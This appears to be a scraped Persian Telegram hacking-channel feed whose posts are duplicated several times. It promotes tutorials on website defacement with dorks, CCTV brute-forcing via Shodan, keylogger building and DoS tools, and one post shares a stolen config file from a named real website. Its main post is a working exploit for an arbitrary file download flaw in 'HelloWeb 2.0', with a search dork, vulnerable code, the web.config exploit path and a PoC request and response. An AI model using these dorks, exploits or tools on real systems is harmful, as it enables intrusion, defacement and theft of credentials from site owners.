ابزار Shodonwave برای جستجو، بروت فورس و اکسپلویت کردن دوربین های مداربسته موجود در اینترنت با استفاده از موتور جستجوی shodan
Github Link
iliyahr
——————
0Day.Today
@LearnExploit
@Tech_Army
Github Link
iliyahr
——————
0Day.Today
@LearnExploit
@Tech_Army
آموزش دیفیس سایت با دورک (2)
Site
#Deface #shell #dork #google_dork
iliyahr
——————
0Day.Today
@LearnExploit
@Tech_Army
Site
#Deface #shell #dork #google_dork
iliyahr
——————
0Day.Today
@LearnExploit
@Tech_Army
#Target #Config #File :)
➖➖➖➖➖➖➖➖➖
#Target :
batikkratonmas.com
#Config File :
Download
➖➖➖➖➖➖➖➖➖
Don't Forget ; I'm Here
IR0Day.Today
@LearnExploit
@Tech_Army
➖➖➖➖➖➖➖➖➖
#Target :
batikkratonmas.com
#Config File :
Download
➖➖➖➖➖➖➖➖➖
Don't Forget ; I'm Here
IR0Day.Today
@LearnExploit
@Tech_Army
Telegram
AttachLearnExploit
آموزش ساخت پسورد لیست با ابزار قدرتمند crunch در کالی لینوکس
#kali #linux #password #passlist #crunch
iliyahr
——————
0Day.Today
@LearnExploit
@Tech_Army
#kali #linux #password #passlist #crunch
iliyahr
——————
0Day.Today
@LearnExploit
@Tech_Army
آموزش دیفیس سایت با دورک (3)
#Deface #shell #dork #google_dork
iliyahr
——————
0Day.Today
@LearnExploit
@Tech_Army
#Deface #shell #dork #google_dork
iliyahr
——————
0Day.Today
@LearnExploit
@Tech_Army
#Exploit #WebApp #HelloWeb #Arbitrary #File #Download #vulnerabilities
#اسیب_پذیری #برنامه_تحت_وب #بارگیری #فایل #دلخواه
➖➖➖➖➖➖➖➖➖
با سلام خدمت دوستان عزیز
در این قسمت اسیب پذیری یافت شده در برنامه ی تحت وب به نام HelloWeb را مورد بررسی قرار دهیم.
➖➖➖➖➖➖➖➖➖➖
IR0Day.Today Guy's
@LearnExploit
@Tech_Army
#اسیب_پذیری #برنامه_تحت_وب #بارگیری #فایل #دلخواه
➖➖➖➖➖➖➖➖➖
با سلام خدمت دوستان عزیز
در این قسمت اسیب پذیری یافت شده در برنامه ی تحت وب به نام HelloWeb را مورد بررسی قرار دهیم.
➖➖➖➖➖➖➖➖➖➖
IR0Day.Today Guy's
@LearnExploit
@Tech_Army
#Exploit #WebApp #HelloWeb #Arbitrary #File #Download #vulnerabilities
#اسیب_پذیری #برنامه_تحت_وب #بارگیری #فایل #دلخواه
➖➖➖➖➖➖➖➖➖
با سلام خدمت دوستان عزیز
در این قسمت اسیب پذیری یافت شده در برنامه ی تحت وب به نام HelloWeb را مورد بررسی قرار دهیم.
ابتدا توضیح مختصری در مورد باگ Arbitrary File Download بدیم :
به زبان ساده اگر توضیح بدم نوع دیگری از باگ ها LFI/RFI میباشد.
با این تفاوت که شما در این باگ قابلیت Travel Dir روندارین! یعنی نمیتونید بین مسیرهای موجود گشت و گذار کنید و فقط میتونید فایل یا فایل های مد نظر رو دانلود کنید.(البته بعضی از پارامتر های موجود این قابلیت رو داره).
اگه هنوز با باگ های LFI و RFI اشنا نیستید روی لینک های زیر کلیک کنید.
Link
➖➖➖➖➖➖➖➖➖➖➖
#Exploit-Title : ( HelloWeb 2.0 - Arbitrary File Download )
#Dork : ( Inurl:exec/file/download.asp )
#vulnerable-Code :
➖➖
filepath = Request.QueryString("filepath")
filename = Request.QueryString("filename")
filepath = Replace(filepath,"/","\")
➖➖
root_path = server.MapPath("/")
Set fso = CreateObject("Scripting.FileSystemObject")
Set root_folder = fso.GetFolder(root_path)
attachfile = root_path & filepath & "\" & filename
➖➖
Response.Clear
Response.ContentType = "application/unknown"
Response.AddHeader "Pragma", "no-cache"
Response.AddHeader "Expires", "0"
Response.AddHeader "Content-Transfer-Encoding", "binary"
Response.AddHeader "Content-Disposition","attachment; filename = " & Server.URLPathEncode(filename)
➖➖
Set objStream = Server.CreateObject("ADODB.Stream")
objStream.Open
➖➖
objStream.Type = 1
objStream.LoadFromFile attachfile
➖➖
Response.BinaryWrite objStream.Read
Response.Flush
➖➖➖➖➖
طبق کد های مد نظر! این کد ها دسترسی دانلود فایل روبرای ما میده.
پارامتر هایی که اسیبپذیر هستند :
filtepath - filename - root_path - fso - root_folder - attachfile - objStream - strFile
چطوری میتوان از پارامترهای اسیب پذیر استفاده کرد :
به مثال زیر دقت کنید :
https://Target/download.asp?filepath=/&filename=hello.pdf
در این URL ما میفهمیم که فایل Download.asp اجازه ی دانلود فایل از مسیر / ( مسیر فعلی که ما هستیم)و فایل hello.pdf رو داده ...
➖➖➖➖➖➖➖➖➖
نحوه ی اکسپلویت این باگ :
#Exploit :
ابتدا با استفاده از دورک سایت اسیب پذیر رو پیدا کنید.
سپس
exec/file/download.asp?filepath=/&filename=web.config
روبه اخر هدفتون اضافه کنید.
البته این یک نمونه هست !
شما میتونید فایل های بیشتری رو با پارامتر متفاوت تست کنید.
➖➖➖➖➖➖➖➖
#PoC
تست :
این تست روی لوکال هاست صورت گرفته.
GET /exec/file/download.asp?filepath=/&filename=web.config HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1
➖➖➖➖➖➖➖➖➖
RESPONSE: (پاسخ)
HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Type: application/unknown; Charset=utf-8
Expires: 0,Thu, 09 Jul 2020 10:51:14 GMT
Server:
Content-Transfer-Encoding: binary
Content-Disposition: attachment; filename = web.config
Set-Cookie: ASPSESSIONIDQQCBDRBB=BEMDPMDDKFHNFKFMJGHIKKKI; path=/
Access-Control-Allow-Origin: *
x-xss-protection: 1; mode=block
Date: Thu, 09 Jul 2020 10:51:14 GMT
Connection: close
➖➖➖
نحوه ی Fix این باگ تو پست بعدی براتون شرح میدم.
امیدوارم که با کارتون بیاد...
هرگونه سوالی داشتید میتونید توی گروه بپرسید.
#X0P4SH4
➖➖➖➖➖➖➖➖➖➖
IR0Day.Today Guy's
@LearnExploit
@Tech_Army
#اسیب_پذیری #برنامه_تحت_وب #بارگیری #فایل #دلخواه
➖➖➖➖➖➖➖➖➖
با سلام خدمت دوستان عزیز
در این قسمت اسیب پذیری یافت شده در برنامه ی تحت وب به نام HelloWeb را مورد بررسی قرار دهیم.
ابتدا توضیح مختصری در مورد باگ Arbitrary File Download بدیم :
به زبان ساده اگر توضیح بدم نوع دیگری از باگ ها LFI/RFI میباشد.
با این تفاوت که شما در این باگ قابلیت Travel Dir روندارین! یعنی نمیتونید بین مسیرهای موجود گشت و گذار کنید و فقط میتونید فایل یا فایل های مد نظر رو دانلود کنید.(البته بعضی از پارامتر های موجود این قابلیت رو داره).
اگه هنوز با باگ های LFI و RFI اشنا نیستید روی لینک های زیر کلیک کنید.
Link
➖➖➖➖➖➖➖➖➖➖➖
#Exploit-Title : ( HelloWeb 2.0 - Arbitrary File Download )
#Dork : ( Inurl:exec/file/download.asp )
#vulnerable-Code :
➖➖
filepath = Request.QueryString("filepath")
filename = Request.QueryString("filename")
filepath = Replace(filepath,"/","\")
➖➖
root_path = server.MapPath("/")
Set fso = CreateObject("Scripting.FileSystemObject")
Set root_folder = fso.GetFolder(root_path)
attachfile = root_path & filepath & "\" & filename
➖➖
Response.Clear
Response.ContentType = "application/unknown"
Response.AddHeader "Pragma", "no-cache"
Response.AddHeader "Expires", "0"
Response.AddHeader "Content-Transfer-Encoding", "binary"
Response.AddHeader "Content-Disposition","attachment; filename = " & Server.URLPathEncode(filename)
➖➖
Set objStream = Server.CreateObject("ADODB.Stream")
objStream.Open
➖➖
objStream.Type = 1
objStream.LoadFromFile attachfile
➖➖
Response.BinaryWrite objStream.Read
Response.Flush
➖➖➖➖➖
طبق کد های مد نظر! این کد ها دسترسی دانلود فایل روبرای ما میده.
پارامتر هایی که اسیبپذیر هستند :
filtepath - filename - root_path - fso - root_folder - attachfile - objStream - strFile
چطوری میتوان از پارامترهای اسیب پذیر استفاده کرد :
به مثال زیر دقت کنید :
https://Target/download.asp?filepath=/&filename=hello.pdf
در این URL ما میفهمیم که فایل Download.asp اجازه ی دانلود فایل از مسیر / ( مسیر فعلی که ما هستیم)و فایل hello.pdf رو داده ...
➖➖➖➖➖➖➖➖➖
نحوه ی اکسپلویت این باگ :
#Exploit :
ابتدا با استفاده از دورک سایت اسیب پذیر رو پیدا کنید.
سپس
exec/file/download.asp?filepath=/&filename=web.config
روبه اخر هدفتون اضافه کنید.
البته این یک نمونه هست !
شما میتونید فایل های بیشتری رو با پارامتر متفاوت تست کنید.
➖➖➖➖➖➖➖➖
#PoC
تست :
این تست روی لوکال هاست صورت گرفته.
GET /exec/file/download.asp?filepath=/&filename=web.config HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1
➖➖➖➖➖➖➖➖➖
RESPONSE: (پاسخ)
HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Type: application/unknown; Charset=utf-8
Expires: 0,Thu, 09 Jul 2020 10:51:14 GMT
Server:
Content-Transfer-Encoding: binary
Content-Disposition: attachment; filename = web.config
Set-Cookie: ASPSESSIONIDQQCBDRBB=BEMDPMDDKFHNFKFMJGHIKKKI; path=/
Access-Control-Allow-Origin: *
x-xss-protection: 1; mode=block
Date: Thu, 09 Jul 2020 10:51:14 GMT
Connection: close
➖➖➖
نحوه ی Fix این باگ تو پست بعدی براتون شرح میدم.
امیدوارم که با کارتون بیاد...
هرگونه سوالی داشتید میتونید توی گروه بپرسید.
#X0P4SH4
➖➖➖➖➖➖➖➖➖➖
IR0Day.Today Guy's
@LearnExploit
@Tech_Army
Telegram
0Day.Today | Learn Exploit | Zero World | Dark web |
iliyahr
——————
0Day.Today
@LearnExploit
@Tech_Army
——————
0Day.Today
@LearnExploit
@Tech_Army
آموزش ساخت کیلاگر با ابزار Hatkey در کالی لینوکس
نوشته شده با پایتون
#Keylogger
iliyahr
——————
0Day.Today
@LearnExploit
@Tech_Army
نوشته شده با پایتون
#Keylogger
iliyahr
——————
0Day.Today
@LearnExploit
@Tech_Army
آموزش دیفیس سایت با دورک (4)
#Deface #shell #dork #google_dork
iliyahr
——————
0Day.Today
@LearnExploit
@Tech_Army
#Deface #shell #dork #google_dork
iliyahr
——————
0Day.Today
@LearnExploit
@Tech_Army
آموزش ddos/dos با ابزار hammer در کالی لینوکس
Github Link
#ddos #dos #tools #kali #linux
iliyahr
——————
0Day.Today
@LearnExploit
@Tech_Army
Github Link
#ddos #dos #tools #kali #linux
iliyahr
——————
0Day.Today
@LearnExploit
@Tech_Army
#فوری #مهم
خیلی فوری: سازمانها و شرکتهای ایرانی حواسشون باشه که یه آسیبپذیری با درجه خطر ۱۰ از ۱۰ در سرویس DNS ویندوز پیدا شده که روی ویندوز سرورهای ۲۰۰۳ تا ۲۰۱۹ جواب میده! اونقدر خطرناکه که ممکنه تمام زیرساختتون رو با دسترسی Domain Admin به مهاجم تقدیم کنه. همین حالا بهروزرسانیهارو انجام بدید.
منبع : آفسک
iliyahr
——————
0Day.Today
@LearnExploit
@Tech_Army
خیلی فوری: سازمانها و شرکتهای ایرانی حواسشون باشه که یه آسیبپذیری با درجه خطر ۱۰ از ۱۰ در سرویس DNS ویندوز پیدا شده که روی ویندوز سرورهای ۲۰۰۳ تا ۲۰۱۹ جواب میده! اونقدر خطرناکه که ممکنه تمام زیرساختتون رو با دسترسی Domain Admin به مهاجم تقدیم کنه. همین حالا بهروزرسانیهارو انجام بدید.
منبع : آفسک
iliyahr
——————
0Day.Today
@LearnExploit
@Tech_Army